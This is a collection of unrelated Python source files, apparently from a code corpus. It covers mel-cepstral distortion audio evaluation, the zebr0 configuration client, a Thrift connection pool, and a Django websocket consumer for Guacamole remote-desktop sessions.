self.label1['fg'] = 'red'''
def saveSchedule(self):
encryptKey[1] = encrypt(f'{self.city}-{self.id}', encryptKey[0])
open(f'{self.cwd}\\schedule.key', 'w').write('|'.join(encryptKey))
if __name__ == '__main__':
app = UI()
app.mainloop()
|
evaluate_mcd.py
|
#!/usr/bin/env python3
# Copyright 2020 Wen-Chin Huang and Tomoki Hayashi
# Apache 2.0 (http://www.apache.org/licenses/LICENSE-2.0)
"""Evaluate MCD between generated and groundtruth audios."""
import argparse
import fnmatch
import logging
import multiprocessing as mp
import os
from typing import Dict
from typing import List
from typing import Tuple
import librosa
import numpy as np
import pysptk
import soundfile as sf
from fastdtw import fastdtw
from scipy import spatial
def find_files(
root_dir: str, query: List[str] = ["*.flac", "*.wav"], include_root_dir: bool = True
) -> List[str]:
"""Find files recursively.
Args:
root_dir (str): Root root_dir to find.
query (List[str]): Query to find.
include_root_dir (bool): If False, root_dir name is not included.
Returns:
List[str]: List of found filenames.
"""
files = []
for root, dirnames, filenames in os.walk(root_dir, followlinks=True):
for q in query:
for filename in fnmatch.filter(filenames, q):
files.append(os.path.join(root, filename))
if not include_root_dir:
files = [file_.replace(root_dir + "/", "") for file_ in files]
return files
def sptk_extract(
x: np.ndarray,
fs: int,
n_fft: int = 512,
n_shift: int = 256,
mcep_dim: int = 25,
mcep_alpha: float = 0.41,
is_padding: bool = False,
) -> np.ndarray:
"""Extract SPTK-based mel-cepstrum.
Args:
x (ndarray): 1D waveform array.
fs (int): Sampling rate
n_fft (int): FFT length in point (default=512).
n_shift (int): Shift length in point (default=256).
mcep_dim (int): Dimension of mel-cepstrum (default=25).
mcep_alpha (float): All pass filter coefficient (default=0.41).
is_padding (bool): Whether to pad the end of signal (default=False).
Returns:
ndarray: Mel-cepstrum with the size (N, n_fft).
"""
# perform padding
if is_padding:
n_pad = n_fft - (len(x) - n_fft) % n_shift
x = np.pad(x, (0, n_pad), "reflect")
# get number of frames
n_frame = (len(x) - n_fft) // n_shift + 1
# get window function
win = pysptk.sptk.hamming(n_fft)
# check mcep and alpha
if mcep_dim is None or mcep_alpha is None:
mcep_dim, mcep_alpha = _get_best_mcep_params(fs)
# calculate spectrogram
mcep = [
pysptk.mcep(
x[n_shift * i : n_shift * i + n_fft] * win,
mcep_dim,
mcep_alpha,
eps=1e-6,
etype=1,
)
for i in range(n_frame)
]
return np.stack(mcep)
def _get_basename(path: str) -> str:
return os.path.splitext(os.path.split(path)[-1])[0]
def _get_best_mcep_params(fs: int) -> Tuple[int, float]:
if fs == 16000:
return 23, 0.42
elif fs == 22050:
return 34, 0.45
elif fs == 24000:
return 34, 0.46
elif fs == 44100:
return 39, 0.53
elif fs == 48000:
return 39, 0.55
else:
raise ValueError(f"Not found the setting for {fs}.")
def calculate(
file_list: List[str],
gt_file_list: List[str],
args: argparse.Namespace,
mcd_dict: Dict,
):
"""Calculate MCD."""
for i, gen_path in enumerate(file_list):
corresponding_list = list(
filter(lambda gt_path: _get_basename(gt_path) in gen_path, gt_file_list)
)
assert len(corresponding_list) == 1
gt_path = corresponding_list[0]
gt_basename = _get_basename(gt_path)
# load wav file as int16
gen_x, gen_fs = sf.read(gen_path, dtype="int16")
gt_x, gt_fs = sf.read(gt_path, dtype="int16")
fs = gen_fs
if gen_fs != gt_fs:
gt_x = librosa.resample(gt_x.astype(np.float), gt_fs, gen_fs)
# extract ground truth and converted features
gen_mcep = sptk_extract(
x=gen_x,
fs=fs,
n_fft=args.n_fft,
n_shift=args.n_shift,
mcep_dim=args.mcep_dim,
mcep_alpha=args.mcep_alpha,
)
gt_mcep = sptk_extract(
x=gt_x,
fs=fs,
n_fft=args.n_fft,
n_shift=args.n_shift,
mcep_dim=args.mcep_dim,
mcep_alpha=args.mcep_alpha,
)
# DTW
_, path = fastdtw(gen_mcep, gt_mcep, dist=spatial.distance.euclidean)
twf = np.array(path).T
gen_mcep_dtw = gen_mcep[twf[0]]
gt_mcep_dtw = gt_mcep[twf[1]]
# MCD
diff2sum = np.sum((gen_mcep_dtw - gt_mcep_dtw) ** 2, 1)
mcd = np.mean(10.0 / np.log(10.0) * np.sqrt(2 * diff2sum), 0)
logging.info(f"{gt_basename} {mcd:.4f}")
mcd_dict[gt_basename] = mcd
def get_parser() -> argparse.Namespace:
"""Get argument parser."""
parser = argparse.ArgumentParser(description="Evaluate Mel-cepstrum distorsion.")
parser.add_argument(
"--wavdir",
required=True,
type=str,
help="Path of directory for generated waveforms.",
)
parser.add_argument(
"--gt_wavdir",
required=True,
type=str,
help="Path of directory for ground truth waveforms.",
)
parser.add_argument(
"--outdir",
type=str,
default=None,
help="Path of directory to write the results.",
)
# analysis related
parser.add_argument(
"--mcep_dim",
default=None,
type=int,
help=(
"Dimension of mel cepstrum coefficients. "
"If None, automatically set to the best dimension for the sampling."
),
)
parser.add_argument(
"--mcep_alpha",
default=None,
type=float,
help=(
"All pass constant for mel-cepstrum analysis. "
"If None, automatically set to the best dimension for the sampling."
),
)
parser.add_argument(
"--n_fft", default=1024, type=int, help="The number of FFT points."
)
parser.add_argument(
"--n_shift", default=256, type=int, help="The number of shift points."
)
parser.add_argument(
"--n_jobs", default=16, type=int, help="Number of parallel jobs."
)
parser.add_argument(
"--verbose",
default=1,
type=int,
help="Verbosity level. Higher is more logging.",
)
return parser
def main():
"""Run MCD calculation in parallel."""
args = get_parser().parse_args()
# logging info
if args.verbose > 1:
logging.basicConfig(
level=logging.DEBUG,
format="%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s",
)
elif args.verbose > 0:
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s",
)
else:
logging.basicConfig(
level=logging.WARN,
format="%(asctime)s (%(module)s:%(lineno)d) %(levelname)s: %(message)s",
)
logging.warning("Skip DEBUG/INFO messages")
# find files
gen_files = sorted(find_files(args.wavdir))
gt_files = sorted(find_files(args.gt_wavdir))
# Get and divide list
if len(gen_files) == 0:
raise FileNotFoundError("Not found any generated audio files.")
if len(gen_files) > len(gt_files):
raise ValueError(
"#groundtruth files are less than #generated files "
f"(#gen={len(gen_files)} vs. #gt={len(gt_files)}). "
"Please check the groundtruth directory."
)
logging.info("The number of utterances = %d" % len(gen_files))
file_lists = np.array_split(gen_files, args.n_jobs)
file_lists = [f_list.tolist() for f_list in file_lists]
# multi processing
with mp.Manager() as manager:
mcd_dict = manager.dict()
processes = []
for f in file_lists:
p = mp.Process(target=calculate, args=(f, gt_files, args, mcd_dict))
p.start()
processes.append(p)
# wait for all process
for p in processes:
p.join()
# convert to standard list
mcd_dict = dict(mcd_dict)
# calculate statistics
mean_mcd = np.mean(np.array([v for v in mcd_dict.values()]))
std_mcd = np.std(np.array([v for v in mcd_dict.values()]))
logging.info(f"Average: {mean_mcd:.4f} ± {std_mcd:.4f}")
# write results
if args.outdir is not None:
os.makedirs(args.outdir, exist_ok=True)
with open(f"{args.outdir}/utt2mcd", "w") as f:
for utt_id in sorted(mcd_dict.keys()):
mcd = mcd_dict[utt_id]
f.write(f"{utt_id} {mcd:.4f}\n")
with open(f"{args.outdir}/resuls.txt", "w") as f:
f.write(f"#utterances: {len(gen_files)}\n")
f.write(f"Average: {mean_mcd:.4f} ± {std_mcd:.4f}")
logging.info("Successfully finished MCD evaluation.")
if __name__ == "__main__":
main()
|
__init__.py
|
from __future__ import annotations
import argparse
import http.server
import json
import threading
from pathlib import Path
from typing import List, Optional, Any
import jinja2
import requests_cache
ENCODING = "utf-8"
URL = "url"
LEVELS = "levels"
CACHE = "cache"
URL_DEFAULT = "https://hub.zebr0.io"
LEVELS_DEFAULT = []
CACHE_DEFAULT = 300
CONFIGURATION_FILE_DEFAULT = Path("/etc/zebr0.conf")
class Client:
"""
Nested key-value system with built-in inheritance and templating, designed for configuration management and deployment.
This Client can connect to any key-value server that follows HTTP REST standards.
For now it only supports plain text responses, JSON support is in the works.
Nested keys and inheritance:
To fully exploit the Client, you should define a structure in the naming of your keys, like "<project>/<environment/<key>".
Then use the "levels" parameter of the constructor to point to a specific project and environment, like ["mattermost", "production"].
Finally, use the get() function to fetch a key and it will automatically look for the most specific value possible.
Note that you don't have to duplicate keys for each project and environment, as they can be inherited from their parent level.
Templating:
You can use the double-braces {{ }} in your values to benefit from the Jinja templating engine.
You can refer to the constructor parameters {{ url }} and {{ levels[x] }}, include the value from another key {{ "another-key" | get }} or the content of a file {{ "/path/to/the/file" | read }}.
Configuration file:
Client configuration can also be read from a JSON file, a simple dictionary with the "url", "levels" and "cache" keys.
The save_configuration() function can help you create one from an existing Client.
The suggested default path can be used for a system-wide configuration.
If provided, constructor parameters will always supersede the values from the configuration file, which in turn supersede the default values.
Note that the inheritance and templating mechanisms are performed by the client, to be as server-agnostic as possible.
:param url: URL of the key-value server, defaults to https://hub.zebr0.io
:param levels: levels of specialization (e.g. ["mattermost", "production"] for a <project>/<environment>/<key> structure), defaults to []
:param cache: in seconds, the duration of the cache of http responses, defaults to 300 seconds
:param configuration_file: path to the configuration file, defaults to /etc/zebr0.conf for a system-wide configuration
"""
def __init__(self, url: str = "", levels: Optional[List[str]] = None, cache: int = 0, configuration_file: Path = CONFIGURATION_FILE_DEFAULT) -> None:
# first set default values
self.url = URL_DEFAULT
self.levels = LEVELS_DEFAULT
self.cache = CACHE_DEFAULT
# then override with the configuration file if present
try:
configuration_string = configuration_file.read_text(ENCODING)
configuration = json.loads(configuration_string)
self.url = configuration.get(URL, URL_DEFAULT)
self.levels = configuration.get(LEVELS, LEVELS_DEFAULT)
self.cache = configuration.get(CACHE, CACHE_DEFAULT)
except OSError:
pass # configuration file not found, ignored
# finally override with the parameters if present
if url:
self.url = url
if levels:
self.levels = levels
if cache:
self.cache = cache
# templating setup
self.jinja_environment = jinja2.Environment(keep_trailing_newline=True)
self.jinja_environment.globals[URL] = self.url
self.jinja_environment.globals[LEVELS] = self.levels
self.jinja_environment.filters["get"] = self.get
self.jinja_environment.filters["read"] = read
# http requests setup
self.http_session = requests_cache.CachedSession(backend="memory", expire_after=cache)
def get(self, key: str, default: str = "", template: bool = True, strip: bool = True) -> str:
"""
Fetches the value of a provided key from the server.
Based on the levels defined in the Client, will return the first key found from the deepest level to the root level.
A default value can be provided to be returned if the key isn't found at any level.
:param key: key to look for
:param default: value to return if the key isn't found at any level, defaults to ""
:param template: shall the value be processed by the templating engine ? defaults to True
:param strip: shall the value be stripped off leading and trailing white spaces ? defaults to True
:return: the resulting value of the key
"""
# let's do this with a nice recursive function :)
def fetch(levels):
full_url = "/".join([self.url] + levels + [key])
response = self.http_session.get(full_url)
if response.ok:
return response.text # if the key is found, we return the value
elif levels:
return fetch(levels[:-1]) # if not, we try at the parent level
else:
return default # if we're at the top level, the key just doesn't exist, we return the default value
value = fetch(self.levels) # let's try at the deepest level first
value = self.jinja_environment.from_string(value).render() if template else value # templating
value = value.strip() if strip else value # stripping
return value
def save_configuration(self, configuration_file: Path = CONFIGURATION_FILE_DEFAULT) -> None:
"""
Saves the Client's configuration to a JSON file.
:param configuration_file: path to the configuration file, defaults to /etc/zebr0.conf for a system-wide configuration
"""
configuration = {URL: self.url, LEVELS: self.levels, CACHE: self.cache}
configuration_string = json.dumps(configuration)
configuration_file.write_text(configuration_string, ENCODING)
class TestServer:
"""
Rudimentary key-value HTTP server, for development or testing purposes only.
The keys and their values are stored in a dictionary, that can be defined either in the constructor or through the "data" attribute.
Access logs are also available through the "access_logs" attribute.
Basic usage:
>>> server = TestServer({"key": "value", ...})
>>> server.start()
>>> ...
>>> server.stop()
Or as a context manager, in which case the server will be started automatically, then stopped at the end of the "with" block:
>>> with TestServer() as server:
>>> server.data = {"key": "value", ...}
>>> ...
:param data: the keys and their values stored in a dictionary, defaults to an empty dictionary
:param address: the address the server will be listening to, defaults to 127.0.0.1
:param port: the port the server will be listening to, defaults to 8000
"""
def __init__(self, data: dict = None, address: str = "127.0.0.1", port: int = 8000) -> None:
self.data = data or {}
self.access_logs = []
class RequestHandler(http.server.BaseHTTPRequestHandler):
def do_GET(zelf):
key = zelf.path[1:] # the key is the request's path, minus the leading "/"
value = self.data.get(key)
if value: # standard HTTP REST behavior
zelf.send_response(200)
zelf.end_headers()
zelf.wfile.write(str(value).encode(ENCODING))
else:
zelf.send_response(404)
zelf.end_headers()
self.access_logs.append(zelf.path)
self.server = http.server.ThreadingHTTPServer((address, port), RequestHandler)
def start(self) -> None:
""" Starts the server in a separate thread. """
threading.Thread(target=self.server.serve_forever).start()
def stop(self) -> None:
""" Stops the server. """
self.server.shutdown()
self.server.server_close()
def __enter__(self) -> TestServer:
""" When used as a context manager, starts the server at the beginning of the "with" block. """
self.start()
return self
def __exit__(self, exc_type, exc_val, exc_tb) -> None:
""" When used as a context manager, stops the server at the end of the "with" block. """
self.stop()
def read(path: str, encoding: str = ENCODING) -> str:
"""
Filter for the Jinja templating engine, that allows to read a file's content.
:param path: path to the file
:param encoding: encoding of the file, defaults to "utf-8"
:return: the content of the file
"""
path = Path(path)
return path.read_text(encoding=encoding) if path.is_file() else ""
def build_argument_parser(*args: Any, **kwargs: Any) -> argparse.ArgumentParser:
"""
Builds an ArgumentParser that zebr0 executables can use to share a common Client CLI syntax.
For some reason, subclassing argparse.ArgumentParser and adding the arguments in the constructor doesn't work well with subparsers.
A builder function does.
:param args: arguments of the ArgumentParser constructor
:param kwargs: keyword arguments of the ArgumentParser constructor
:return: the customized ArgumentParser
"""
argparser = argparse.ArgumentParser(*args, **kwargs)
argparser.add_argument("-u", "--url", help="URL of the key-value server, defaults to https://hub.zebr0.io", metavar="<url>")
argparser.add_argument("-l", "--levels", nargs="*", help='levels of specialization (e.g. "mattermost production" for a <project>/<environment>/<key> structure), defaults to ""', metavar="<level>")
argparser.add_argument("-c", "--cache", type=int, help="in seconds, the duration of the cache of http responses, defaults to 300 seconds", metavar="<duration>")
argparser.add_argument("-f", "--configuration-file", type=Path, default=CONFIGURATION_FILE_DEFAULT, help=f"path to the configuration file, defaults to {CONFIGURATION_FILE_DEFAULT} for a system-wide configuration", metavar="<path>")
return argparser
def main(args: Optional[List[str]] = None) -> None:
"""
usage: zebr0-setup [-h] [-u <url>] [-l [<level> [<level> ...]]] [-c <duration>] [-f <path>] [-t <key>]
Saves zebr0's configuration in a JSON file.
optional arguments:
-h, --help show this help message and exit
-u <url>, --url <url>
URL of the key-value server, defaults to https://hub.zebr0.io
-l [<level> [<level> ...]], --levels [<level> [<level> ...]]
levels of specialization (e.g. "mattermost production" for a <project>/<environment>/<key> structure), defaults to ""
-c <duration>, --cache <duration>
in seconds, the duration of the cache of http responses, defaults to 300 seconds
-f <path>, --configuration-file <path>
path to the configuration file, defaults to /etc/zebr0.conf for a system-wide configuration
-t <key>, --test <key>
tests the configuration by fetching a key (e.g. 'fqdn')
"""
argparser = build_argument_parser(description="Saves zebr0's configuration in a JSON file.")
argparser.add_argument("-t", "--test", help="tests the configuration by fetching a key (e.g. 'fqdn')", metavar="<key>")
args = argparser.parse_args(args)
# creates a client from the given parameters, then saves the configuration
client = Client(args.url, args.levels, args.cache)
client.save_configuration(args.configuration_file)
if args.test:
# creates a client from the configuration file, then tests the configuration
client = Client(configuration_file=args.configuration_file)
print(client.get(args.test))
|
connection_pool.py
|
# -*- coding: utf-8 -*-
import logging
import contextlib
import random
import threading
import time
import socket
from collections import deque
from .hooks import api_call_context, client_get_hook
logger = logging.getLogger(__name__)
SIGNAL_CLOSE_NAME = "close"
def validate_host_port(host, port):
if not all((host, port)):
raise RuntimeError("host and port not valid: %r:%r" % (host, port))
class ThriftBaseClient(object):
def __init__(self, host, port, transport, protocol, service,
keepalive=None, pool_generation=0, tracking=False,
tracker_factory=None, pool=None, socket=None, use_limit=None):
self.host = host
self.port = port
self.transport = transport
self.protocol = protocol
self.service = service
self.keepalive = keepalive
self.alive_until = time.time() + keepalive if keepalive else None
self.use_count = 0
self.use_limit = use_limit
self.pool_generation = pool_generation
self.tracking = tracking
self.tracker_factory = tracker_factory
self.socket = socket
self.pool = pool
self.latest_use_time = time.time()
self.client = self.get_tclient(service, protocol)
self.init_client(self.client)
def __repr__(self):
return "<%s service=%s>" % (
self.__class__.__name__,
self.service.__name__
)
def __getattr__(self, name):
return getattr(self.client, name)
def init_client(self, client):
pass
def close(self):
try:
self.transport.close()
except Exception as e:
logger.warn("Connection close failed: %r" % e)
finally:
self.pool.signal_handler(SIGNAL_CLOSE_NAME, self)
def is_expired(self):
now = time.time()
return (self.alive_until and now > self.alive_until and
random.random() < (now - self.alive_until)/self.keepalive)
def incr_use_count(self):
self.use_count += 1
def set_latest_use_time(self, time):
self.latest_use_time = time
def is_tired(self):
return self.use_limit and self.use_count > self.use_limit
def test_connection(self):
if self.is_expired() or self.is_tired():
return False
try:
self.ping()
return True
except:
return False
@classmethod
def connect(cls, service, host, port, timeout=30, keepalive=None,
pool_generation=0, tracking=False, tracker_factory=None,
pool=None, use_limit=None):
SOCKET = cls.get_socket_factory()(host, port)
cls.set_timeout(SOCKET, timeout * 1000)
PROTO_FACTORY = cls.get_protoco_factory()
TRANS_FACTORY = cls.get_transport_factory()
transport = TRANS_FACTORY(SOCKET)
protocol = PROTO_FACTORY(transport)
transport.open()
return cls(
host=host,
port=port,
transport=transport,
protocol=protocol,
service=service,
keepalive=keepalive,
pool_generation=pool_generation,
tracking=tracking,
tracker_factory=tracker_factory,
pool=pool,
socket=SOCKET,
use_limit=use_limit,
)
@property
def TTransportException(self):
raise NotImplementedError
@classmethod
def get_protoco_factory(self):
raise NotImplementedError
@classmethod
def get_transport_factory(self):
raise NotImplementedError
def get_tclient(self, service, protocol):
raise NotImplementedError
@classmethod
def get_socket_factory(self):
raise NotImplementedError
@classmethod
def set_timeout(cls, socket, timeout):
raise NotImplementedError
def set_client_timeout(self, timeout):
self.set_timeout(self.socket, timeout)
def get_timeout(self):
raise NotImplementedError
class ThriftClient(ThriftBaseClient):
def init_client(self, client):
for api in dir(client):
if not api.startswith(('_', '__', 'send_', 'recv_')):
target = getattr(client, api)
setattr(client, api,
api_call_context(self.pool, self, api)(target))
@property
def TTransportException(self):
from thrift.transport.TTransport import TTransportException
return TTransportException
@classmethod
def get_protoco_factory(self):
from thrift.protocol import TBinaryProtocol
return TBinaryProtocol.TBinaryProtocolAccelerated
@classmethod
def get_transport_factory(self):
from thrift.transport import TTransport
return TTransport.TBufferedTransport
def get_tclient(self, service, protocol):
if self.tracking is True:
raise NotImplementedError(
"%s doesn't support tracking" % self.__class__.__name__)
return service.Client(protocol)
@classmethod
def get_socket_factory(self):
from thrift.transport import TSocket
return TSocket.TSocket
@classmethod
def set_timeout(cls, socket, timeout):
socket.setTimeout(timeout)
def get_timeout(self):
return self.socket._timeout
class ThriftPyBaseClient(ThriftBaseClient):
def init_client(self, client):
for api in self.service.thrift_services:
target = getattr(client, api)
setattr(client, api,
api_call_context(self.pool, self, api)(target))
@property
def TTransportException(self):
from thriftpy2.transport import TTransportException
return TTransportException
def get_tclient(self, service, protocol):
if self.tracking is True:
from thriftpy2.contrib.tracking import TTrackedClient
client = TTrackedClient(self.tracker_factory, service, protocol)
else:
from thriftpy2.thrift import TClient
client = TClient(service, protocol)
return client
@classmethod
def get_socket_factory(self):
from thriftpy2.transport import TSocket
return TSocket
@classmethod
def set_timeout(cls, socket, timeout):
socket.set_timeout(timeout)
def get_timeout(self):
return self.socket.socket_timeout
class ThriftPyClient(ThriftPyBaseClient):
@classmethod
def get_protoco_factory(self):
from thriftpy2.protocol import TBinaryProtocolFactory
return TBinaryProtocolFactory().get_protocol
@classmethod
def get_transport_factory(self):
from thriftpy2.transport import TBufferedTransportFactory
return TBufferedTransportFactory().get_transport
class ThriftPyCyClient(ThriftPyBaseClient):
@classmethod
def get_protoco_factory(self):
from thriftpy2.protocol import TCyBinaryProtocolFactory
return TCyBinaryProtocolFactory().get_protocol
@classmethod
def get_transport_factory(self):
from thriftpy2.transport import TCyBufferedTransportFactory
return TCyBufferedTransportFactory().get_transport
class BaseClientPool(object):
QueueCls = deque
def __init__(self, service, timeout=30, name=None, raise_empty=False,
max_conn=30, connection_class=ThriftClient, keepalive=None,
tracking=False, tracker_factory=None, use_limit=None):
if service is None:
raise RuntimeError("Service cannot be None")
self.service = service
self.timeout = timeout
self.name = name or service.__name__
self.connections = self.QueueCls()
self.raise_empty = raise_empty
self.max_conn = max_conn
self.connection_class = connection_class
self.keepalive = keepalive
self.use_limit = use_limit
self.generation = 0
self.tracking = tracking
self.tracker_factory = tracker_factory
self.conn_close_callbacks = []
self.__api_method_cache = {}
@contextlib.contextmanager
def annotate(self, **kwds):
if not self.tracking:
raise NotImplementedError("Tracking is not enabled")
with self.tracker_factory.annotate(**kwds) as annotation:
yield annotation
def keys(self):
return set([self.name, self.service.__name__])
def __repr__(self):
return "<%s service=%r>" % (
self.__class__.__name__,
self.keys()
)
def fill_connection_pool(self):
"""Fill connections pool
"""
rest_size = self.max_conn - self.pool_size()
for _ in range(rest_size):
try:
conn = self.produce_client()
self.put_back_connection(conn)
except Exception as e:
pass
def pool_size(self):
return len(self.connections)
def clear(self):
old_connections = self.connections
self.connections = self.QueueCls()
self.generation += 1
for c in old_connections:
c.close()
def get_client_from_pool(self):
connection = self._get_connection()
if connection is None:
return
if connection.test_connection(): # make sure old connection is usable
return connection
else:
connection.close()
def _get_connection(self):
if not self.connections:
if self.raise_empty:
raise self.Empty
return None
try:
return self.connections.popleft()
# When only one connection left, just return None if it
# has already been popped in another thread.
except IndexError:
return None
def put_back_connection(self, conn):
assert isinstance(conn, ThriftBaseClient)
if self.max_conn > 0 and self.pool_size() < self.max_conn and\
conn.pool_generation == self.generation:
if self.timeout != conn.get_timeout():
conn.set_client_timeout(self.timeout * 1000)
self.connections.append(conn)
return True
else:
conn.close()
return False
def produce_client(self, host=None, port=None):
if host is None and port is None:
host, port = self.yield_server()
elif not all((host, port)):
raise ValueError("host and port should be 'both none' \
or 'both provided' ")
return self.connection_class.connect(
self.service,
host,
port,
self.timeout,
keepalive=self.keepalive,
pool_generation=self.generation,
tracking=self.tracking,
tracker_factory=self.tracker_factory,
pool=self,
use_limit=self.use_limit,
)
@client_get_hook
def get_client(self):
return self.get_client_from_pool() or self.produce_client()
def __getattr__(self, name):
method = self.__api_method_cache.get(name)
if not method:
def method(*args, **kwds):
client = self.get_client()
api = getattr(client, name, None)
will_put_back = True
try:
if api and callable(api):
return api(*args, **kwds)
raise AttributeError("%s not found in %s" % (name, client))
except (client.TTransportException, socket.error):
will_put_back = False
client.close()
raise
finally:
if will_put_back:
self.put_back_connection(client)
self.__api_method_cache[name] = method
return method
@contextlib.contextmanager
def connection_ctx(self, timeout=None):
client = self.get_client()
if timeout is not None:
client.set_client_timeout(timeout * 1000)
try:
yield client
self.put_back_connection(client)
except (client.TTransportException, socket.error):
client.close()
raise
except Exception:
self.put_back_connection(client)
raise
@contextlib.contextmanager
def make_temporary_client(self, host, port):
client = self.produce_client(host, port)
try:
yield client
except Exception:
raise
finally:
client.close()
def register_after_close_func(self, func):
self.conn_close_callbacks.append(func)
def signal_handler(self, signal_name, conn):
if signal_name == SIGNAL_CLOSE_NAME:
for cb in self.conn_close_callbacks:
try:
cb(self, conn)
except:
logger.warn("%s Callback failed" % SIGNAL_CLOSE_NAME,
exc_info=True)
class ClientPool(BaseClientPool):
def __init__(self, service, host, port, timeout=30, name=None,
raise_empty=False, max_conn=30, connection_class=ThriftClient,
keepalive=None, tracking=False, tracker_factory=None,
use_limit=None):
validate_host_port(host, port)
super(ClientPool, self).__init__(
service=service,
timeout=timeout,
name=name,
raise_empty=raise_empty,
max_conn=max_conn,
connection_class=connection_class,
keepalive=keepalive,
tracking=tracking,
tracker_factory=tracker_factory,
use_limit=use_limit,
)
self.host = host
self.port = port
def set_servers(self, server_info):
host, port = server_info
validate_host_port(host, port)
self.host = host
self.port = port
self.clear()
# def fill_connection_pool(self):
# raise RuntimeError(
# '{!r} class not support to fill connection pool'.format(
# self.__class__.__name__))
def yield_server(self):
return self.host, self.port
class HeartbeatClientPool(ClientPool):
def __init__(self, service, host, port, timeout=30, name=None,
raise_empty=False, max_conn=30, connection_class=ThriftClient,
keepalive=None, tracking=False, tracker_factory=None,
use_limit=None, check_interval=10):
super(HeartbeatClientPool, self).__init__(
service=service,
host=host,
port=port,
timeout=timeout,
name=name,
raise_empty=raise_empty,
max_conn=max_conn,
connection_class=connection_class,
keepalive=keepalive,
tracking=tracking,
tracker_factory=tracker_factory,
use_limit=use_limit,
)
self.check_interval = check_interval
t = threading.Thread(target=self.maintain_connections)
t.daemon = True
t.start()
def get_client_from_pool(self):
return self._get_connection()
def maintain_connections(self):
while True:
try:
self.fill_connection_pool()
pool_size = self.pool_size()
for _ in range(pool_size):
conn = self.get_client_from_pool()
if conn is None:
self.fill_connection_pool()
break
if not conn.test_connection():
conn.close()
conn = self.produce_client()
self.put_back_connection(conn)
except Exception as e:
pass
time.sleep(self.check_interval)
# def maintain_connections(self):
# sleep_time = max(1, self.timeout-5)
# while True:
# time.sleep(sleep_time)
# pool_size = self.pool_size()
# for _ in range(pool_size):
# conn = self.get_client_from_pool()
# if conn is None:
# break
# if (time.time()-conn.latest_use_time < self.check_interval or
# conn.test_connection()):
# self.put_back_connection(conn)
# else:
# conn.close()
class MultiServerClientBase(BaseClientPool):
def __init__(self, service, servers, timeout=30, name=None,
raise_empty=False, max_conn=30, connection_class=ThriftClient,
keepalive=None, tracking=False, tracker_factory=None,
use_limit=None):
super(MultiServerClientBase, self).__init__(
service=service,
timeout=timeout,
name=name,
raise_empty=raise_empty,
max_conn=max_conn,
connection_class=connection_class,
keepalive=keepalive,
tracking=tracking,
tracker_factory=None,
use_limit=use_limit,
)
self.servers = list(servers)
def set_servers(self, server_info):
for i in server_info:
assert len(i) == 2
validate_host_port(*i)
self.servers = server_info
self.clear()
class RandomMultiServerClient(MultiServerClientBase):
def yield_server(self):
assert len(self.servers) > 0
return random.choice(self.servers)
class RoundRobinMultiServerClient(MultiServerClientBase):
def __init__(self, *args, **kwds):
super(RoundRobinMultiServerClient, self).__init__(*args, **kwds)
self.index = random.randint(0, len(self.servers) - 1)
random.shuffle(self.servers)
def yield_server(self):
assert len(self.servers) > 0
if self.index >= len(self.servers):
self.index = 0
ret = self.servers[self.index]
self.index += 1
return ret
|
websocket_layer.py
|
import threading
from channels.generic.websocket import WebsocketConsumer
from django.conf import settings
from server.models import RemoteUserBindHost
from webssh.models import TerminalSession
import django.utils.timezone as timezone
from django.db.models import Q
from asgiref.sync import async_to_sync
from util.tool import gen_rand_char, terminal_log, res
from util.crypto import decrypt
import time
from .guacamoleclient import Client
import re
import base64
from django.http.request import QueryDict
try:
terminal_exipry_time = settings.CUSTOM_TERMINAL_EXIPRY_TIME
except Exception:
terminal_exipry_time = 60 * 30
class WebGuacamole(WebsocketConsumer):
def __init__(self, *args, **kwargs):
super().__init__(*args, **kwargs)
query_string = self.scope.get('query_string').decode()
guacamole_args = QueryDict(query_string=query_string, encoding='utf-8')
self.hostid = int(guacamole_args.get('hostid'))
self.remote_host = None
self.width = guacamole_args.get('width')
self.height = guacamole_args.get('height')
self.dpi = guacamole_args.get('dpi')
self.session = None
self.start_time = timezone.now()
self.send_flag = 0 # 0 发送自身通道,1 发送 group 通道,作用为当管理员查看会话时,进入 group 通道
self.group = 'session_' + gen_rand_char()
self.guacamoleclient = None
self.lock = False
self.last_operation_time = time.time()
self.closed = False
self.client = None
self.user_agent = None
def connect(self):
self.accept('guacamole')
async_to_sync(self.channel_layer.group_add)(self.group, self.channel_name) # 加入组
self.session = self.scope.get('session', None)
if not self.session.get('islogin', None): # 未登录直接断开 websocket 连接
self.close(3001)
if 'webguacamole终端' not in self.session[settings.INIT_PERMISSION]['titles']: # 判断权限
self.close(3001)
if not self.session['issuperuser']:
hosts = RemoteUserBindHost.objects.filter(
Q(id=self.hostid),
Q(enabled=True),
Q(user__username=self.session['username']) | Q(group__user__username=self.session['username']),
).distinct()
else:
hosts = RemoteUserBindHost.objects.filter(
Q(id=self.hostid),
Q(enabled=True),
).distinct()
if not hosts:
self.close(3001)
self.remote_host = RemoteUserBindHost.objects.get(id=self.hostid)
_type = 7
if self.remote_host.get_protocol_display() == 'vnc': # vnc 登陆不需要账号
_type = 8
self.guacamoleclient = Client(websocker=self)
self.guacamoleclient.connect(
protocol=self.remote_host.get_protocol_display(),
hostname=self.remote_host.ip,
port=self.remote_host.port,
username=self.remote_host.remote_user.username,
password=decrypt(self.remote_host.remote_user.password),
width=self.width,
height=self.height,
dpi=self.dpi,
)
for i in self.scope['headers']:
if i[0].decode('utf-8') == 'user-agent':
self.user_agent = i[1].decode('utf-8')
break
for i in self.scope['headers']:
if i[0].decode('utf-8') == 'x-real-ip':
self.client = i[1].decode('utf-8')
break
if i[0].decode('utf-8') == 'x-forwarded-for':
self.client = i[1].decode('utf-8').split(',')[0]
break
self.client = self.scope['client'][0]
data = {
'name': self.channel_name,
'group': self.group,
'user': self.session.get('username'),
'host': self.remote_host.ip,
'username': self.remote_host.remote_user.username,
'protocol': self.remote_host.protocol,
'port': self.remote_host.port,
'type': _type, # 7 webrdp 8 webvnc
'address': self.client,
'useragent': self.user_agent,
}
TerminalSession.objects.create(**data)
t = threading.Thread(target=self.check_timeout)
t.daemon = True
t.start()
def disconnect(self, close_code):
time.sleep(0.5)
if not self.closed:
self.closed = True
try:
async_to_sync(self.channel_layer.group_discard)(self.group, self.channel_name)
if close_code != 3001:
self.guacamoleclient.close()
except Exception:
pass
finally:
if self.guacamoleclient.res:
try:
tmp = list(self.guacamoleclient.res)
self.guacamoleclient.res = []
res(self.guacamoleclient.res_file, tmp, False)
except Exception:
pass
try:
terminal_log(
self.session.get('username'),
self.remote_host.hostname,
self.remote_host.ip,
